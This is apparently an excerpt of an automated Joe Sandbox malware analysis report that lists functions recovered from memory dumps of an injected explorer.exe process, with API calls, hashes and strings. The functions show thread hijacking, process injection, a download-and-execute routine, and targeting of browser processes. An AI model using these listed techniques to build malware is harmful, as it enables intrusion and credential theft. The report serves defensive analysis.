                                                                                                                                                                                                                        • Instruction ID: 2b75dbc53502fdbc924aa4d4956a87a5eb12904526bf011539a5d1858e8b7a54
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE08660A1670383EF3A2B7174553799220AF5DF51F88143CCE0A89751EF2C95D59300
                                                                                                                                                                                                                        Function 0DFA7660 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2622297391-0
                                                                                                                                                                                                                        • Opcode ID: 6abd5b3272766fed2057ca6335340b6bd206ca77af65de36614cec0bc2ef62cd
                                                                                                                                                                                                                        • Instruction ID: 93a575be7eb92766e86dcb94e5acea66bffe52d14d42278c2dabfb21ffcbca1d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6abd5b3272766fed2057ca6335340b6bd206ca77af65de36614cec0bc2ef62cd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D3138A1B16B4185EF21AF1EE510B6AB6A2F748FC4F18843ADA4D0BB18EF78C5518750
                                                                                                                                                                                                                        Function 0DFA82A0 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 882653843-0
                                                                                                                                                                                                                        • Opcode ID: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction ID: daa0f6e7dd027387904f172f3cb6fba617206e3a58be1c3aecf05c3cedc1a0a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C831DDA360878186D7118F79A50036D7BA1F305FC8F088216EF998B79ADB6CD451C724
                                                                                                                                                                                                                        Function 0DFAA880 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: lstrlenA.KERNEL32 ref: 0DFAA6C2
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: InternetCrackUrlA.WININET ref: 0DFAA6D7
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: PathFindFileNameA.SHLWAPI ref: 0DFAA751
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: GetTempPathA.KERNEL32 ref: 0DFAA76F
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: GetTempFileNameA.KERNEL32 ref: 0DFAA785
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: lstrcatA.KERNEL32 ref: 0DFAA795
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: lstrcatA.KERNEL32 ref: 0DFAA7A1
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: CreateFileA.KERNEL32 ref: 0DFAA7CA
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: SHGetFolderPathA.SHELL32 ref: 0DFA9EC3
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9ED3
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9EE1
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: CreateDirectoryA.KERNEL32 ref: 0DFA9EEC
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: SetFileAttributesA.KERNEL32 ref: 0DFA9EFA
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9F0A
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9F18
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9F28
                                                                                                                                                                                                                        • DeleteFileA.KERNEL32 ref: 0DFAA910
                                                                                                                                                                                                                        • CopyFileA.KERNEL32 ref: 0DFAA926
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0DFAA939
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3447680573-0
                                                                                                                                                                                                                        • Opcode ID: 35aa4db215c5fc156b0e988b7bb3c47b17532f7827867ebc2ad3a055e454aab3
                                                                                                                                                                                                                        • Instruction ID: 6a337636f237b3d5761b3a420d5b9436f1afa8e1fbb3970d6973adcd3b900427
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35aa4db215c5fc156b0e988b7bb3c47b17532f7827867ebc2ad3a055e454aab3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E721C37272C98281EB30D72DE8647EA7351FBDC748F8190119A8E46A48EF6CC309CB10
                                                                                                                                                                                                                        Function 0DFA85F0 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: GetCurrentProcessId.KERNEL32 ref: 0DFA845B
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: GetCurrentThreadId.KERNEL32 ref: 0DFA8467
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: HeapAlloc.KERNEL32 ref: 0DFA8491
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: Thread32Next.KERNEL32 ref: 0DFA84F0
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: CloseHandle.KERNEL32 ref: 0DFA8500
                                                                                                                                                                                                                        • OpenThread.KERNEL32 ref: 0DFA863E
                                                                                                                                                                                                                        • SuspendThread.KERNEL32 ref: 0DFA864F
                                                                                                                                                                                                                          • Part of subcall function 0DFA89F0: GetThreadContext.KERNEL32 ref: 0DFA8A24
                                                                                                                                                                                                                          • Part of subcall function 0DFA89F0: SetThreadContext.KERNEL32 ref: 0DFA8AE4
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFA8666
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4205413918-0
                                                                                                                                                                                                                        • Opcode ID: f87ba56fbfc39a26588533dbd85fbd0d1f2ef08c9963a931b1320233d17f7ec2
                                                                                                                                                                                                                        • Instruction ID: fb6f22c7edbc2987f47abd05852d0b7c093d01393a6ebc968cf66569ff034d88
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f87ba56fbfc39a26588533dbd85fbd0d1f2ef08c9963a931b1320233d17f7ec2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5015B32615B8196D714DF1AA49062EB771F789FC4F98D135DF8A03B18CF38D9628B04
                                                                                                                                                                                                                        Function 0DFA8900 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA83B0: Sleep.KERNEL32 ref: 0DFA83DC
                                                                                                                                                                                                                        • HeapCreate.KERNEL32 ref: 0DFA891D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateHeapSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 221814145-0
                                                                                                                                                                                                                        • Opcode ID: ce5d471f1fa3be9d25ce499402e3443f5f1b3496d36fc271069fe1ba1ca05d49
                                                                                                                                                                                                                        • Instruction ID: 6faf7d0130e1bfd60e6551c7858ac079b618ee459647ded96b3f46af5365d622
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce5d471f1fa3be9d25ce499402e3443f5f1b3496d36fc271069fe1ba1ca05d49
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1E03991B0634142FB297BFD588233D32849B08390F48D8398F1905391DEA8CCE99672

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 0E1017F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction ID: cb6b94608c63ae66c917366a09324e1b05d9d2cc6220fd31528a285ad6e8f229
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50C13832705B8596EB20DF72E85439E77A1F789B88F800525DE8A57B68DF7CC649CB00
                                                                                                                                                                                                                        Function 0FF417F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction ID: 2e71ea06920a4ecdc0095f8d88cbe90df16955651b14fb0d9476c02760cdbc77
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAC1103560874796EB24DF62E8547B9B7A1FB89B98F400135DE4A87B18DF38E149DB00
                                                                                                                                                                                                                        Function 0E106E10 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction ID: 7daed0db37e5beb27e89fb0af995a8506a241871bc53b4dc4d64e898c5b9be01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF1B1B2304AC186DB30EF22E8503EA77A1F748B99F445926CE4A87BD4DBB8D5C4C741
                                                                                                                                                                                                                        Function 0FF46E10 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction ID: 4686aaf45dfbb5fef383fe7f08f5f028aa0773d76483b6b7635e196af606aedb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8F17472604A82C6DB309F25E8847BA7BA1FF44BC9F845135CA4A47B65DF78E189C740
                                                                                                                                                                                                                        Function 0DFA1370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction ID: 0ac6a821863e37498a53dce0886eb166645e793505a8925b3c8ffe79cf138d0f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87814D76704B818AEB60CF66F8447AEB7A6F788B98F458125DE8D47B18DF38C155CB00
                                                                                                                                                                                                                        Function 0E101370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction ID: e368d888705cc208b17b3d852cd85b209d2e4500e47fbcccb641dbfed9c59141
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4813572705B808AEB20CF62F85479EB7A5F788BA8F440615DE8D57B58DF78C545CB00
                                                                                                                                                                                                                        Function 0FF41370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 596952117-2766056989
                                                                                                                                                                                                                        • Opcode ID: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction ID: 7cc299b1c9541dc6bd6c99ceb56c9cab2692c0e626f7b02e6df81767771a6626
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86d6601ff1abbd3528c250d927e794814dcf930b7d33c1d111a0d0f2e290d252
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53812C72718B8186EB60DF61E8447AEB7A5FB88B98F404225DE8D87F18DF78D055CB00
                                                                                                                                                                                                                        Function 0E10A620 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0E10A6C2
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0E10A6D7
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcpyA.KERNEL32 ref: 0E106E6E
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E7F
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E93
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EA7
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EB8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106ECC
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EEA
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: wsprintfA.USER32 ref: 0E106F02
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F16
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F2A
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F66
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: WSAStartup.WS2_32 ref: 0E106F76
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: socket.WS2_32 ref: 0E106F92
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: gethostbyname.WS2_32 ref: 0E106FA9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: memcpy.MSVCRT ref: 0E106FC9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: htons.WS2_32 ref: 0E106FD8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: connect.WS2_32 ref: 0E106FEF
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrlenA.KERNEL32 ref: 0E107005
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: send.WS2_32 ref: 0E10701B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0E10A751
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0E10A76F
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0E10A785
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10A795
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10A7A1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0E10A7CA
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0E10A7EF
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10A7FE
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E10A807
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0E10A835
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0E10A844
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10A84F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction ID: 9473b7fb07fa80d4b7375f97cdb793de5098e85ba1a77939618990005f8978b5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3a24cb8d624ece3b86332d21e7091f11c7b9a917e87207749051ceddd69b08
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80518F72704B808AEB20CF62E8543DE77A0FB88B89F544815DE9957B98DFB8C585CB01
